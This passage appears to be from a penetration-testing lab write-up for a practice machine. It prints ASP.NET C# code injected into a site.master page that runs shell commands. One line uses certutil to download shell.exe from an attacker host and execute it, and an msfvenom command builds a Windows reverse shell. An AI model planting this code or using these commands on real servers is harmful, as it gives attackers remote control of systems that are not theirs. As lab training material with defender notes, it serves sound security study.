Embedded C# Payload
<%
// Inline ASP.NET code block: when the page renders, it runs one fixed OS command
// on the server and writes that command's standard output into the HTTP response.
string stdout = "";
// The command is hard-coded; "whoami" prints the account the child process runs as.
string cmd = "whoami";
// The command is passed to the Windows shell as: cmd /c <cmd>.
// Defender note: the observable artifact is a cmd.exe child of the process hosting
// the page (under IIS presumably the w3wp.exe worker; confirm for the host in question).
System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("cmd", "/c " + cmd);
// Capture the child's stdout through a pipe; redirection requires UseShellExecute = false.
procStartInfo.RedirectStandardOutput = true;
procStartInfo.UseShellExecute = false;
// No console window is created for the child process.
procStartInfo.CreateNoWindow = true;
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo = procStartInfo;
p.Start();
// Blocks until the child closes its stdout. The exit code is not checked and the
// Process object is never disposed.
stdout = p.StandardOutput.ReadToEnd();
// The captured text is written into the response body as-is (no HTML encoding).
Response.Write(stdout);
%>
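A simple C# payload embedded into the site.master
file to check for code execution: if the rendered page contains the output of whoami, the code ran, and that output names the account the web application runs as.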
Reverse Shell
<%
// Inline ASP.NET code block: runs two shell commands in order, pausing 3 seconds
// before each one, and writes each command's standard output into the HTTP response.
string stdout = "";
ArrayList commands = new ArrayList();
// Command 1: certutil.exe fetches http://192.168.45.221:445/shell.exe and saves it
// as C:\inetpub\wwwroot\shell.exe.
// Defender note: the artifacts are certutil.exe run with -urlcache -split -f and an
// HTTP URL, and a new .exe appearing under the web root. The write can only succeed
// if the identity running the page has write access to that directory.
commands.Add("certutil.exe -urlcache -split -f \"http://192.168.45.221:445/shell.exe\" \"C:\\inetpub\\wwwroot\\shell.exe\"");
// Command 2: executes the file that command 1 saved.
commands.Add("\"C:\\inetpub\\wwwroot\\shell.exe\"");
foreach (string cmd in commands) {
// Fixed 3-second delay before every command, including the first.
System.Threading.Thread.Sleep(3000);
// Each command is passed to the Windows shell as: cmd /c <cmd>, so every
// iteration starts a new cmd.exe child of the process hosting the page.
System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("cmd", "/c " + cmd);
// Capture the child's stdout through a pipe; redirection requires UseShellExecute = false.
procStartInfo.RedirectStandardOutput = true;
procStartInfo.UseShellExecute = false;
// No console window is created for the child process.
procStartInfo.CreateNoWindow = true;
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo = procStartInfo;
p.Start();
// Blocks until the child closes its stdout, so the HTTP request stays open for as
// long as the launched program keeps running. Exit codes are not checked and the
// Process objects are never disposed.
stdout = p.StandardOutput.ReadToEnd();
// The captured text is written into the response body as-is (no HTML encoding).
Response.Write(stdout);
}
%>
Updated payload to download and execute the reverse shell executable
msfvenom
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/butch]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.221 LPORT=450 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe
msfvenom generated a reverse shell executable